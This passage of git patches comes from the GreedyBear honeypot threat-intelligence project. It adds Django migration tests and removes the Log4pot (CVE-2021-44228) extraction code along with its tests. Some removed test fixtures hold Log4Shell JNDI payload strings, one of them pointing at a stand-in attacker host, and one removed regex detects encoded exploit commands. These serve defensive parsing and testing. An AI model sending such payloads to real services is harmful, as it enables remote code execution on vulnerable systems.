- if [[ -z '${{ inputs.project_dev_requirements_file }}' ]];then
+ if [[ -n '${{ inputs.project_dev_requirements_file }}' ]];then
cat $(echo ${{ inputs.project_dev_requirements_file }}) >> requirements-dev.txt
fi
shell: bash
diff --git a/.github/workflows/_python.yml b/.github/workflows/_python.yml
index 044b163c..28fe71bb 100644
--- a/.github/workflows/_python.yml
+++ b/.github/workflows/_python.yml
@@ -20,6 +20,10 @@ on:
description: Path to the requirements.txt file
type: string
required: true
+ project_dev_requirements_file:
+ description: Path to an additional project dev requirements file
+ type: string
+ required: false
install_from:
description: Directory that must be used to install the packages
type: string
@@ -325,7 +329,7 @@ jobs:
uses: ./.github/actions/python_requirements/create_dev_requirements_file
with:
install_from: ${{ inputs.install_from }}
- use_coverage: ${{ inputs.use_coverage }}
+ project_dev_requirements_file: ${{ inputs.project_dev_requirements_file }}
- name: Create docs requirements file
uses: ./.github/actions/python_requirements/create_docs_requirements_file
diff --git a/.github/workflows/pull_request_automation.yml b/.github/workflows/pull_request_automation.yml
index e6b60b06..96c45d92 100644
--- a/.github/workflows/pull_request_automation.yml
+++ b/.github/workflows/pull_request_automation.yml
@@ -63,6 +63,7 @@ jobs:
use_ruff_linter: true
requirements_path: requirements/project-requirements.txt
+ project_dev_requirements_file: requirements/dev-requirements.txt
packages_path: packages.txt
django_settings_module: greedybear.settings
@@ -86,6 +87,8 @@ jobs:
upload_coverage: true
tags_for_slow_tests: main
+ custom_command: python manage.py test --tag=migration --failfast
+
env: >-
{
"ENVIRONMENT": "ci",
diff --git a/greedybear/settings.py b/greedybear/settings.py
index d197280f..b5d6a994 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -421,3 +421,6 @@
# Optional feed license URL to include in API responses
# If not set, no license information will be included in feeds
FEEDS_LICENSE = os.environ.get("FEEDS_LICENSE", "")
+
+# Project test runner
+TEST_RUNNER = "tests.test_runner.CustomTestRunner"
diff --git a/requirements/dev-requirements.txt b/requirements/dev-requirements.txt
index 3cf3908d..e0c6a9b0 100644
--- a/requirements/dev-requirements.txt
+++ b/requirements/dev-requirements.txt
@@ -2,3 +2,4 @@
# Installed conditionally in Docker: INSTALL_DEV=true
# For manual installation: pip install -r requirements/dev-requirements.txt
coverage>=7.3.2
+django-test-migrations>=1.5.0
diff --git a/tests/__init__.py b/tests/__init__.py
index fdf715f9..6109d8c3 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -3,7 +3,8 @@
from unittest.mock import Mock
from certego_saas.apps.user.models import User
-from django.test import TestCase
+from django.test import TestCase, TransactionTestCase
+from django_test_migrations.migrator import Migrator
from greedybear.models import (
IOC,
@@ -247,6 +248,28 @@ def to_dict(self):
return self._data.copy()
+class MigrationTestCase(TransactionTestCase):
+ """
+ Reusable base class for migration tests.
+ """
+
+ app_name = "greedybear"
+ migrate_from = None
+ migrate_to = None
+
+ def setUp(self):
+ super().setUp()
+ self.migrator = Migrator(database="default")
+ self.old_state = self.migrator.apply_initial_migration((self.app_name, self.migrate_from))
+
+ def apply_tested_migration(self):
+ return self.migrator.apply_tested_migration((self.app_name, self.migrate_to))
+
+ def tearDown(self):
+ self.migrator.reset()
+ super().tearDown()
+
+
class E2ETestCase(ExtractionTestCase):
"""Base test case for E2E pipeline tests with real strategies.
diff --git a/tests/test_migrations.py b/tests/test_migrations.py
new file mode 100644
index 00000000..04898b0b
--- /dev/null
+++ b/tests/test_migrations.py
@@ -0,0 +1,76 @@
+from django.test import tag
+
+from . import MigrationTestCase
+
+
+@tag("migration")
+class TestRemoveHardcodedHoneypots(MigrationTestCase):
+ """Tests that hardcoded honeypots are removed only when no IOC references them."""
+
+ migrate_from = "0028_generalhoneypot_unique_generalhoneypot_name_ci"
+ migrate_to = "0029_remove_hardcoded_honeypots"
+
+ def test_honeypots_deleted_only_if_unused(self):
+ IOC = self.old_state.apps.get_model(self.app_name, "IOC")
+ GeneralHoneypot = self.old_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+ used_hp = GeneralHoneypot.objects.get(name="Ciscoasa")
+
+ ioc = IOC.objects.create()
+ ioc.general_honeypot.add(used_hp)
+
+ new_state = self.apply_tested_migration()
+ hp_new = new_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+ self.assertFalse(
+ hp_new.objects.filter(name="Heralding").exists(),
+ "Unused honeypot should be deleted",
+ )
+
+ self.assertTrue(
+ hp_new.objects.filter(name="Ciscoasa").exists(),
+ "Honeypot linked to IOC must not be deleted",
+ )
+
+
+@tag("migration")
+class TestCowrieLog4jMigration(MigrationTestCase):
+ """Tests migration of cowrie and log4j boolean flags into the GeneralHoneypot M2M relation."""
+
+ migrate_from = "0029_remove_hardcoded_honeypots"
+ migrate_to = "0030_migrate_cowrie_log4j"
+
+ def test_boolean_flags_are_migrated_to_m2m(self):
+ IOC = self.old_state.apps.get_model(self.app_name, "IOC")
+ self.old_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+ # creating iocs covering all flag combinations
+ ioc_cowrie = IOC.objects.create(cowrie=True, log4j=False)
+ ioc_log4j = IOC.objects.create(cowrie=False, log4j=True)
+ ioc_both = IOC.objects.create(cowrie=True, log4j=True)
+ ioc_none = IOC.objects.create(cowrie=False, log4j=False)
+
+ new_state = self.apply_tested_migration()
+ ioc_new = new_state.apps.get_model(self.app_name, "IOC")
+ hp_new = new_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+ # fetching migrated honeypots
+ cowrie_hp = hp_new.objects.get(name="Cowrie")
+ log4pot_hp = hp_new.objects.get(name="Log4pot")
+
+ self.assertEqual(
+ set(ioc_new.objects.get(id=ioc_cowrie.id).general_honeypot.all()),
+ {cowrie_hp},
+ )
+ self.assertEqual(
+ set(ioc_new.objects.get(id=ioc_log4j.id).general_honeypot.all()),
+ {log4pot_hp},
+ )
+ self.assertEqual(
+ set(ioc_new.objects.get(id=ioc_both.id).general_honeypot.all()),
+ {cowrie_hp, log4pot_hp},
+ )
+ self.assertEqual(
+ ioc_new.objects.get(id=ioc_none.id).general_honeypot.count(),
+ 0,
+ )
diff --git a/tests/test_runner.py b/tests/test_runner.py
new file mode 100644
index 00000000..a14f2fb9
--- /dev/null
+++ b/tests/test_runner.py
@@ -0,0 +1,25 @@
+import sys
+
+from django.test.runner import DiscoverRunner
+
+
+class CustomTestRunner(DiscoverRunner):
+ def __init__(self, *args, **kwargs):
+ kwargs = self.migration_test_config(kwargs)
+ super().__init__(*args, **kwargs)
+
+ def migration_test_config(self, kwargs):
+ "Detects if migration tests are requested and updates exclude_tags."
+ migration_requested = "--tag=migration" in sys.argv or any("test_migrations" in arg for arg in sys.argv)
+
+ if migration_requested:
+ print("\nRunning migration tests\n")
+ else:
+ current_exclude_tags = kwargs.get("exclude_tags") or set()
+ if not isinstance(current_exclude_tags, set):
+ current_exclude_tags = set(current_exclude_tags)
+ current_exclude_tags.add("migration")
+ kwargs["exclude_tags"] = current_exclude_tags
+ print("\nAuto-excluding migration tests (use --tag=migration to run them)\n")
+
+ return kwargs
From 3d0ea32bc7ad2bd70e333f36c070873404918420 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 3 Feb 2026 11:17:40 +0100
Subject: [PATCH 75/75] Remove Log4j. Closes #410 and #635 (#760)
* remove strategy and related code
* update URL in readme
* replace log4j occurrences in docstrings
* remove log4j references from frontend test
* remove log4j from several docstrings
---
README.md | 2 +-
api/views/feeds.py | 6 +-
.../tests/components/feeds/Feeds.test.jsx | 10 +-
greedybear/consts.py | 4 -
.../extraction/strategies/__init__.py | 1 -
.../cronjobs/extraction/strategies/factory.py | 2 -
.../cronjobs/extraction/strategies/log4pot.py | 150 ------------------
greedybear/cronjobs/repositories/ioc.py | 5 +-
greedybear/cronjobs/scoring/utils.py | 2 +-
greedybear/regex.py | 1 -
.../cronjobs/test_extraction_pipeline_e2e.py | 84 +---------
.../test_extraction_pipeline_factory.py | 13 --
12 files changed, 16 insertions(+), 264 deletions(-)
delete mode 100644 greedybear/cronjobs/extraction/strategies/log4pot.py
diff --git a/README.md b/README.md
index acb57d4c..b1452bf9 100644
--- a/README.md
+++ b/README.md
@@ -21,7 +21,7 @@ Documentation about GreedyBear installation, usage, configuration and contributi
## Public feeds
-There are public feeds provided by [The Honeynet Project](https://www.honeynet.org) in this [site](https://greedybear.honeynet.org). [Example](https://greedybear.honeynet.org/api/feeds/log4j/all/recent.txt)
+There are public feeds provided by [The Honeynet Project](https://www.honeynet.org) in this [site](https://greedybear.honeynet.org). [Example](https://greedybear.honeynet.org/api/feeds/cowrie/all/recent.txt)
Please do not perform too many requests to extract feeds or you will be banned.
diff --git a/api/views/feeds.py b/api/views/feeds.py
index c6e56524..37890f53 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
@@ -32,7 +32,7 @@ def feeds(request, feed_type, attack_type, prioritize, format_):
Args:
request: The incoming request object.
- feed_type (str): Type of feed (e.g., log4j, cowrie, etc.).
+ feed_type (str): Type of feed (e.g. cowrie, honeytrap, etc.).
attack_type (str): Type of attack (e.g., all, specific attack types).
prioritize (str): Prioritization mechanism to use (e.g., recent, persistent).
format_ (str): Desired format of the response (e.g., json, csv, txt).
@@ -91,7 +91,7 @@ def feeds_advanced(request):
Args:
request: The incoming request object.
- feed_type (str): Type of feed to retrieve. (supported: `cowrie`, `log4j`, etc.; default: `all`)
+ feed_type (str): Type of feed to retrieve. (supported: `cowrie`, `honeytrap`, etc.; default: `all`)
attack_type (str): Type of attack to filter. (supported: `scanner`, `payload_request`, `all`; default: `all`)
max_age (int): Maximum number of days since last occurrence. E.g. an IOC that was last seen 4 days ago is excluded by default. (default: 3)
min_days_seen (int): Minimum number of days on which an IOC must have been seen. (default: 1)
@@ -130,7 +130,7 @@ def feeds_asn(request):
Args:
request: The HTTP request object.
- feed_type (str): Filter by feed type (e.g., 'cowrie', 'log4j'). Default: 'all'.
+ feed_type (str): Filter by feed type (e.g. 'cowrie', 'honeytrap'). Default: 'all'.
attack_type (str): Filter by attack type (e.g., 'scanner', 'payload_request'). Default: 'all'.
max_age (int): Maximum age of IOCs in days. Default: 3.
min_days_seen (int): Minimum days an IOC must have been observed. Default: 1.
diff --git a/frontend/tests/components/feeds/Feeds.test.jsx b/frontend/tests/components/feeds/Feeds.test.jsx
index 53b5f162..97967a4d 100644
--- a/frontend/tests/components/feeds/Feeds.test.jsx
+++ b/frontend/tests/components/feeds/Feeds.test.jsx
@@ -21,7 +21,7 @@ jest.mock("@certego/certego-ui", () => {
first_seen: "2023-03-15",
last_seen: "2023-03-15",
attack_count: 1,
- feed_type: "log4j",
+ feed_type: "cowrie",
},
],
},
@@ -38,7 +38,7 @@ jest.mock("@certego/certego-ui", () => {
...originalModule,
useAxiosComponentLoader: jest.fn(() => [
- ["Honeytrap", "Glutton", "CitrixHoneypot", "Log4j", "Cowrie"],
+ ["Honeytrap", "Glutton", "CitrixHoneypot", "Cowrie"],
loader,
]),
@@ -88,7 +88,7 @@ describe("Feeds component", () => {
"/api/feeds/all/all/recent.json"
);
- await user.selectOptions(feedTypeSelectElement, "log4j");
+ await user.selectOptions(feedTypeSelectElement, "cowrie");
await user.selectOptions(attackTypeSelectElement, "scanner");
await user.selectOptions(iocTypeSelectElement, "ip");
await user.selectOptions(prioritizationSelectElement, "persistent");
@@ -97,7 +97,7 @@ describe("Feeds component", () => {
// check link has been changed including ioc_type parameter
expect(buttonRawData).toHaveAttribute(
"href",
- "/api/feeds/log4j/scanner/persistent.json?ioc_type=ip"
+ "/api/feeds/cowrie/scanner/persistent.json?ioc_type=ip"
);
});
@@ -106,7 +106,7 @@ describe("Feeds component", () => {
await waitFor(() => {
expect(buttonRawData).toHaveAttribute(
"href",
- "/api/feeds/log4j/scanner/persistent.json?ioc_type=domain"
+ "/api/feeds/cowrie/scanner/persistent.json?ioc_type=domain"
);
});
});
diff --git a/greedybear/consts.py b/greedybear/consts.py
index 0e8eefe6..fb3af390 100644
--- a/greedybear/consts.py
+++ b/greedybear/consts.py
@@ -19,12 +19,8 @@
"dest_port",
"ip_rep",
"geoip",
- "deobfuscated_payload",
- "correlation_id",
"url",
"message",
- "reason",
- "correlation_id",
"eventid",
"session",
"timestamp",
diff --git a/greedybear/cronjobs/extraction/strategies/__init__.py b/greedybear/cronjobs/extraction/strategies/__init__.py
index ea386477..b3d4612e 100644
--- a/greedybear/cronjobs/extraction/strategies/__init__.py
+++ b/greedybear/cronjobs/extraction/strategies/__init__.py
@@ -1,4 +1,3 @@
from greedybear.cronjobs.extraction.strategies.base import *
from greedybear.cronjobs.extraction.strategies.cowrie import *
from greedybear.cronjobs.extraction.strategies.generic import *
-from greedybear.cronjobs.extraction.strategies.log4pot import *
diff --git a/greedybear/cronjobs/extraction/strategies/factory.py b/greedybear/cronjobs/extraction/strategies/factory.py
index 4efdf11a..c7e7a07d 100644
--- a/greedybear/cronjobs/extraction/strategies/factory.py
+++ b/greedybear/cronjobs/extraction/strategies/factory.py
@@ -2,7 +2,6 @@
BaseExtractionStrategy,
CowrieExtractionStrategy,
GenericExtractionStrategy,
- Log4potExtractionStrategy,
)
from greedybear.cronjobs.repositories import IocRepository, SensorRepository
@@ -26,7 +25,6 @@ def __init__(self, ioc_repo: IocRepository, sensor_repo: SensorRepository):
self.sensor_repo = sensor_repo
self._strategies = {
"Cowrie": lambda: CowrieExtractionStrategy("Cowrie", self.ioc_repo, self.sensor_repo),
- "Log4pot": lambda: Log4potExtractionStrategy("Log4pot", self.ioc_repo, self.sensor_repo),
}
def get_strategy(self, honeypot: str) -> BaseExtractionStrategy:
diff --git a/greedybear/cronjobs/extraction/strategies/log4pot.py b/greedybear/cronjobs/extraction/strategies/log4pot.py
deleted file mode 100644
index 879b14cb..00000000
--- a/greedybear/cronjobs/extraction/strategies/log4pot.py
+++ /dev/null
@@ -1,150 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-import base64
-import re
-from urllib.parse import urlparse
-
-from greedybear.consts import PAYLOAD_REQUEST, SCANNER
-from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy
-from greedybear.cronjobs.extraction.utils import get_ioc_type
-from greedybear.cronjobs.repositories import IocRepository, SensorRepository
-from greedybear.models import IOC
-from greedybear.regex import REGEX_CVE_BASE64COMMAND, REGEX_CVE_URL, REGEX_URL
-
-
-class Log4potExtractionStrategy(BaseExtractionStrategy):
- """
- Extraction strategy for Log4pot honeypot (CVE-2021-44228).
- Extracts scanner IPs, payload URLs from JNDI/LDAP exploit attempts,
- and hidden URLs from base64-encoded commands. Links related IOCs
- (scanners to payload hosts) via foreign key relationships.
- """
-
- def __init__(
- self,
- honeypot: str,
- ioc_repo: IocRepository,
- sensor_repo: SensorRepository,
- ):
- super().__init__(honeypot, ioc_repo, sensor_repo)
-
- def extract_from_hits(self, hits: list[dict]) -> None:
- # we want to get only probes that tried to exploit the specific log4j CVE
- hits = [hit for hit in hits if hit.get("reason", "") == "exploit"]
-
- url = None
- hostname = None
- hidden_url = None
- hidden_hostname = None
- added_scanners = 0
- added_payloads = 0
- added_hidden_payloads = 0
-
- for hit in hits:
- scanner_ip = self._get_scanner_ip(hit["correlation_id"], hits)
-
- match = re.search(REGEX_CVE_URL, hit["deobfuscated_payload"])
- if match:
- # we are losing the protocol but that's ok for now
- url = match.group()
- url_adjusted = "tcp:" + url
- # removing double slash
- url = url[2:]
- self.log.info(f"found URL {url} in payload for CVE-2021-44228")
- # protocol required or extraction won't work
- hostname = urlparse(url_adjusted).hostname
- self.log.info(f"extracted hostname {hostname} from {url}")
-
- # it is possible to extract another payload from base64 encoded string.
- # this is a behavior related to the attack that leverages LDAP
- match_command = re.search(REGEX_CVE_BASE64COMMAND, hit["deobfuscated_payload"])
- if match_command:
- # we are losing the protocol but that's ok for now
- base64_encoded = match_command.group(1)
- self.log.info(f"found base64 encoded command {base64_encoded} in payload from base64 code for CVE-2021-44228")
- try:
- decoded_str = base64.b64decode(base64_encoded).decode()
- self.log.info(f"decoded base64 command to {decoded_str} from payload from base64 code for CVE-2021-44228")
- except Exception as e:
- self.log.warning(e, stack_info=True)
- else:
- match_url = re.search(REGEX_URL, decoded_str)
- if match_url:
- hidden_url = match_url.group()
- if "://" not in hidden_url:
- hidden_url = "tcp://" + hidden_url
- self.log.info(f"found hidden URL {hidden_url} in payload for CVE-2021-44228")
-
- hidden_hostname = urlparse(hidden_url).hostname
- self.log.info(f"extracted hostname {hidden_hostname} from {hidden_url}")
-
- # add scanner
- if scanner_ip:
- ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip))
- self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
- added_scanners += 1
-
- # add first URL
- if hostname:
- related_urls = [url] if url else []
- ioc = IOC(
- name=scanner_ip,
- type=get_ioc_type(scanner_ip),
- related_urls=related_urls,
- )
- self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
- added_payloads += 1
-
- # add hidden URL
- if hidden_hostname:
- related_urls = [hidden_url] if hidden_url else []
- ioc = IOC(
- name=hostname,
- type=get_ioc_type(hostname),
- related_urls=related_urls,
- )
- self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Log4pot")
- added_hidden_payloads += 1
-
- # once all have added, we can add the foreign keys
- self._add_fks(scanner_ip, hostname, hidden_hostname)
-
- self.log.info(f"added {added_scanners} scanners, {added_payloads} payloads and {added_hidden_payloads} hidden payloads")
-
- def _add_fks(self, scanner_ip: str, hostname: str, hidden_hostname: str) -> None:
- self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}, {hidden_hostname}")
- scanner_ip_instance = self.ioc_repo.get_ioc_by_name(scanner_ip)
- hostname_instance = self.ioc_repo.get_ioc_by_name(hostname)
- hidden_hostname_instance = self.ioc_repo.get_ioc_by_name(hidden_hostname)
-
- if scanner_ip_instance is not None:
- if hostname_instance and hostname_instance not in scanner_ip_instance.related_ioc.all():
- scanner_ip_instance.related_ioc.add(hostname_instance)
- if hidden_hostname_instance and hidden_hostname_instance not in scanner_ip_instance.related_ioc.all():
- scanner_ip_instance.related_ioc.add(hidden_hostname_instance)
- self.ioc_repo.save(scanner_ip_instance)
-
- if hostname_instance is not None:
- if scanner_ip_instance and scanner_ip_instance not in hostname_instance.related_ioc.all():
- hostname_instance.related_ioc.add(scanner_ip_instance)
- if hidden_hostname_instance and hidden_hostname_instance not in hostname_instance.related_ioc.all():
- hostname_instance.related_ioc.add(hidden_hostname_instance)
- self.ioc_repo.save(hostname_instance)
-
- if hidden_hostname_instance is not None:
- if hostname_instance and hostname_instance not in hidden_hostname_instance.related_ioc.all():
- hidden_hostname_instance.related_ioc.add(hostname_instance)
- if scanner_ip_instance and scanner_ip_instance not in hidden_hostname_instance.related_ioc.all():
- hidden_hostname_instance.related_ioc.add(scanner_ip_instance)
- self.ioc_repo.save(hidden_hostname_instance)
-
- def _get_scanner_ip(self, correlation_id: str, hits: list[dict]) -> str | None:
- self.log.info(f"extracting scanner IP from correlation_id {correlation_id}")
- filtered_hits = [hit for hit in hits if str(hit.get("correlation_id", "")) == str(correlation_id) and hit.get("reason", "") == "request"]
-
- if not filtered_hits:
- self.log.warning(f"scanner IP was not extracted from correlation_id {correlation_id}")
- return None
- scanner_ip = filtered_hits[0]["src_ip"]
- self.log.info(f"extracted scanner IP {scanner_ip} from correlation_id {correlation_id}")
- return scanner_ip
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index a63bd354..ddeb1c9f 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -164,9 +164,8 @@ def get_scanners_for_scoring(self, score_fields: list[str]) -> list[IOC]:
"""
Get all scanners associated with active honeypots for scoring.
- Retrieves IOCs that are marked as scanners and are associated with either
- Cowrie, Log4j, or active general honeypots. Returns only the name field
- and specified score fields for efficiency.
+ Retrieves IOCs that are marked as scanners and are associated with any
+ active honeypot. Returns only the name field and specified score fields for efficiency.
Args:
score_fields: List of score field names to retrieve (e.g., ['recurrence_probability']).
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 6e097203..a7f2b383 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -169,7 +169,7 @@ def get_current_data(days_lookback: int = 30, ioc_repo=None) -> list[dict]:
Retrieves IOCs that:
- Are scanners
- Were seen in the specified lookback period
- - Are associated with either Cowrie, Log4j, or active general honeypots
+ - Are associated with any active honeypot
Args:
days_lookback: Number of days to look back for last_seen timestamp.
diff --git a/greedybear/regex.py b/greedybear/regex.py
index 57e0a269..f9fab79e 100644
--- a/greedybear/regex.py
+++ b/greedybear/regex.py
@@ -1,6 +1,5 @@
# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
# See the file 'LICENSE' for copying permission.
REGEX_CVE_URL = r"//[a-zA-Z\d_-]{1,200}(?:\.[a-zA-Z\d_-]{1,200})+(?::\d{2,6})?(?:/[a-zA-Z\d_=-]{1,200})*(?:\.\w+)?"
-REGEX_CVE_BASE64COMMAND = r"/Command/Base64/((?:[a-zA-Z\+\/\d]+)(?:={0,3}))}"
REGEX_URL = REGEX_CVE_URL[2:]
REGEX_URL_PROTOCOL = r"(?:htt|ft|tc|lda)ps?:?" + REGEX_CVE_URL
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
index d37e9dd1..54104caf 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
@@ -88,73 +88,6 @@ def test_cowrie_extracts_login_credentials(self, mock_session_repo, mock_scores)
self.assertGreaterEqual(result, 0)
-class TestLog4potE2E(E2ETestCase):
- """E2E tests for Log4pot extraction through the real pipeline."""
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- def test_log4pot_extracts_exploit_ioc(self, mock_scores):
- """
- E2E: Log4pot exploit event → real Log4potExtractionStrategy → IOC.
- """
- pipeline = self._create_pipeline_with_real_factory()
-
- log4pot_hits = [
- MockElasticHit(
- {
- "src_ip": "198.51.100.10",
- "type": "Log4pot",
- "reason": "exploit",
- "correlation_id": "corr123",
- "deobfuscated_payload": "${jndi:ldap://evil.attacker.com:1389/a}",
- "timestamp": "2025-01-01T08:00:00",
- "dest_port": 8080,
- }
- ),
- ]
- pipeline.elastic_repo.search.return_value = [log4pot_hits]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
- pipeline.ioc_repo.get_ioc_by_name.return_value = None
-
- mock_ioc = self._create_mock_ioc("198.51.100.10")
- with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
- mock_add.return_value = mock_ioc
- result = pipeline.execute()
-
- self.assertGreaterEqual(result, 0)
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- def test_log4pot_non_exploit_skipped(self, mock_scores):
- """
- E2E: Log4pot request (non-exploit) → should not extract payload IOC.
- """
- pipeline = self._create_pipeline_with_real_factory()
-
- log4pot_hits = [
- MockElasticHit(
- {
- "src_ip": "10.0.0.50",
- "type": "Log4pot",
- "reason": "request", # Not an exploit
- "correlation_id": "req123",
- "timestamp": "2025-01-01T10:00:00",
- }
- ),
- ]
- pipeline.elastic_repo.search.return_value = [log4pot_hits]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
- pipeline.ioc_repo.get_ioc_by_name.return_value = None
-
- mock_ioc = self._create_mock_ioc("10.0.0.50")
- with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
- mock_add.return_value = mock_ioc
- result = pipeline.execute()
-
- # Should still process scanner IOC but not payload
- self.assertGreaterEqual(result, 0)
-
-
class TestGenericE2E(E2ETestCase):
"""E2E tests for generic/unknown honeypot extraction."""
@@ -198,7 +131,7 @@ class TestMixedHoneypotE2E(E2ETestCase):
@patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_scores):
"""
- E2E: Mixed Cowrie + Log4pot + Generic → correct strategy for each.
+ E2E: Mixed Cowrie + Dionaea → correct strategy for each.
"""
pipeline = self._create_pipeline_with_real_factory()
@@ -213,16 +146,6 @@ def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_sc
"dest_port": 22,
}
),
- MockElasticHit(
- {
- "src_ip": "10.2.2.2",
- "type": "Log4pot",
- "reason": "exploit",
- "correlation_id": "log4_corr",
- "deobfuscated_payload": "${jndi:ldap://test.com:1389/a}",
- "timestamp": "2025-01-01T10:00:01",
- }
- ),
MockElasticHit(
{
"src_ip": "10.3.3.3",
@@ -413,8 +336,9 @@ def test_multiple_honeypots_ioc_content_verified(self, mock_scores):
MockElasticHit(
{
"src_ip": "10.0.0.3",
- "type": "Log4pot",
- "path": "/api",
+ "type": "Cowrie",
+ "session": "sess3",
+ "eventid": "cowrie.session.connect",
"@timestamp": "2025-01-15T12:00:00",
}
),
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
index ca658850..3285a926 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
@@ -22,16 +22,6 @@ def test_factory_creates_cowrie_strategy_for_cowrie(self):
self.assertIsInstance(strategy, CowrieExtractionStrategy)
- def test_factory_creates_log4pot_strategy_for_log4pot(self):
- """Factory should return Log4potExtractionStrategy for 'Log4pot' honeypot."""
- from greedybear.cronjobs.extraction.strategies import Log4potExtractionStrategy
- from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
-
- factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
- strategy = factory.get_strategy("Log4pot")
-
- self.assertIsInstance(strategy, Log4potExtractionStrategy)
-
def test_factory_creates_generic_strategy_for_unknown(self):
"""Factory should return GenericExtractionStrategy for unknown honeypots."""
from greedybear.cronjobs.extraction.strategies import GenericExtractionStrategy
@@ -67,9 +57,6 @@ def test_factory_strategies_have_correct_honeypot_name(self):
cowrie_strategy = factory.get_strategy("Cowrie")
self.assertEqual(cowrie_strategy.honeypot, "Cowrie")
- log4pot_strategy = factory.get_strategy("Log4pot")
- self.assertEqual(log4pot_strategy.honeypot, "Log4pot")
-
generic_strategy = factory.get_strategy("Heralding")
self.assertEqual(generic_strategy.honeypot, "Heralding")